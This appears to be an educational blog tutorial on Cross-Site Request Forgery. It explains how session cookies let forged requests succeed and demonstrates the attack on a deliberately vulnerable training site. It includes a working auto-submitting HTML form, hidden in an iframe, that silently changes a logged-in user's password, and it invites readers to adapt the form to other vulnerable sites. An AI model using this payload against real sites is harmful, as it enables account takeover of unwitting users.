Website Hack With CSRF Attacks
What is a CSRF Attack:
Cross-Site Request Forgery (CSRF) is a web security vulnerability: a type of attack in which a malicious web site, email, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site while the user is authenticated to it.
It allows an attacker to force the victim user to perform state-changing requests such as transferring funds, changing their email address, and so on. If the victim is an administrative account, CSRF can compromise the entire web application.
How it works:
A CSRF attack tricks the victim into submitting malicious requests, and those requests inherit the identity and privileges of the victim user. Think about what happens when you log in to a site: you can visit different pages of the site and stay logged in, and even after you quit your browser and come back some time later you will often find you are still logged in. So how does that site distinguish you from other users, or know that it is really you?
The answer is that the site recognises the user’s session cookie, IP address, Windows domain credentials, and so forth. Every time your browser hits that website, it includes your session cookie, IP, credentials and more with the request. The attacker does not need to steal them: when the attacker causes your browser to send a request to that site, the browser attaches them automatically, and the site has no way to distinguish that request from one you made yourself.
CSRF attacks target functionality that causes a state change on the server, such as changing the victim’s email address or password, or purchasing something. Forcing the victim to retrieve data doesn’t benefit an attacker because the attacker doesn’t receive the response, the victim does. As such, CSRF attacks target state-changing requests.
A CSRF Hacking Demo:
First of all, an attacker finds out whether your website is vulnerable to CSRF or not; if it is, they will try to get your browser to submit a form with hidden values, as described above. Let’s see this in a practical manner.
Here I am using a deliberately CSRF-vulnerable training site -> https://hack-yourself-first.com/ so you can follow along with me (only for educational purposes).
Before we start, go to that website, register an account and log in. Let’s start.
- Step 1: Go to > My account > Change Password
- Step 2: Open your browser’s Inspect tool (Ctrl+Shift+I) and find the HTML of the New Password and Confirm new password fields:
<input id="NewPassword" name="NewPassword" type="password" value="technotom">
<input id="ConfirmPassword" name="ConfirmPassword" type="password" value="technotom">
These are the form fields that matter. If we can make the victim’s browser submit a form containing them remotely, via JavaScript, the password will be changed without the victim user knowing.
- Step 3: It’s time for some code. Open your IDE and write this HTML (the original had a typo, “terget”, in the form’s target attribute, which is corrected here so the submission really lands in the hidden frame):
<html>
<body onload="document.form.submit()">
  <!-- auto-submits as soon as the page loads; the victim’s browser attaches its session cookie -->
  <form action="https://hack-yourself-first.com/Account/ChangePassword" target="hiddenFrame" method="post" name="form">
    <input id="NewPassword" name="NewPassword" type="password" value="hack001">
    <input id="ConfirmPassword" name="ConfirmPassword" type="password" value="hack001">
  </form>
  <!-- the response is rendered into this hidden frame, so the victim sees nothing -->
  <iframe name="hiddenFrame" style="display: none;"></iframe>
</body>
</html>
Save it as “form.html” and open it in your browser… and the magic happens in the background.
You can adapt this for any other CSRF-vulnerable site: find the HTML of the field you want to change, put the URL that handles the form in the form action, and that’s pretty much everything.
- Step 4: Open your browser’s Inspect tool (Ctrl+Shift+I) again and find the HTML of the New Password and Confirm new password fields.
Now you will see the password value as "hack001". You can guess what that means: we changed the password to "hack001". That was the practical part.
More that can be done:
It’s sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called “stored CSRF flaws”. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack.
If the attacker can store a CSRF attack in the site, the attack is amplified. In particular, the likelihood of success is increased because the victim is more likely to view the page containing the attack than some random page on the Internet, and because the victim is sure to be authenticated to the site already.
Yeah, that’s pretty much everything I wanted to share.